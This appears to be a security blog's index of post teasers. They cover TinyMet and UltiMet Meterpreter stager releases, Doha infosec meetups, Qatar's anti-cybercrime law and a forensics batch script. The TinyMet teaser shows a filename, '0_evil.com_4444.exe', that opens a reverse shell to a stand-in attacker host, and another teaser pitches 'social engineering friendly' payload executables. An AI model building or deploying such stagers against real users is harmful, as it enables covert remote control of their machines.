TinyMet v0.2 Released

TinyMet is a tiny “4.5 kilobytes” flexible meterpreter stager, which supports multiple meterpreter transports, setting LPORT and LHOST during runtime. What’s new in v0.2: Now tinymet can parse the Transport, LPORT and LHOST from its own filename through separating them by underscore Example: “0_evil.com_4444.exe” will use reverse_tcp, LHOST=evil.com, LPORT=4444 This makes tinymet more (double-click/payload-like/argument-less) friendly. … [Read more…]

0xC0FF33 – 3rd Doha Infosec Community Gathering: New Anti-Cybercrime law of Qatar

During our third 0xcoffee gathering, we discussed the New Anti-Cybercrime law of Qatar, and why should we, as infosec folks, care. The law is also available in the official MoJ site “Almeezan”: http://www.almeezan.qa/LawPage.aspx?id=6366&language=ar Please find all the materials attached, 0xC0FFEE – What is it: An informal get together, to have coffee & talk hackery. “The coffee sessions will … [Read more…]

0xC0FF33 – 2nd Doha Infosec Community Gathering

  We had a short presentation on the second 0xC0FF33 gathering about metasploit, meterpreter, tinymet and ultimet. Download the slides from here: TinyMet&UltiMet 0xC0FF33 Is an informal get together for the infosec community in Qatar, to have coffee & talk hackery, so, if you are an infosec guy who lives in Qatar, sign up here to join the … [Read more…]

COPP – simple batch script for live forensics and baseline creation

To detect something “abnormal” in your computer network, you need to first know how the “normal” looks like … sounds simple, right? do you have a list of the processes that “normally” runs on your computer? network connections? how about system drivers? no? where’s “explorer.exe” in your computer? c:\windows or c:\windows\system32? don’t know? didn’t think … [Read more…]

[ultimet v0.25.1] – msfpayload functions & social engineering friendly

25 – 01 Revolution Edition What’s new in this version? msfpayload functionality: It can create exe files that connects upon execution using pre-configured settings “exactly as msfpayload generated exe”, however, generated exe files still accept command line arguments and settings could be reset or changed, all that supported from within that single exe … “meterpreter-on-steroids”. (thanks … [Read more…]

[ultimet_v0.2] – Added support for bind_tcp & bind_metsvc

What’s new: – Anwar Mohamed “@anwarelmakrahy” Added support for metsvc_bind_tcp & bind_tcp… `git pull` if you’re interested in the source code, or just get the binaries from here. … Thanks, Anwar! – Now ultimet works as the following meterpreter payloads: reverse_tcp bind_tcp reverse_http reverse_https bint_metsvc <- when stage included reverse_metsvc <- when stage included – Code got just … [Read more…]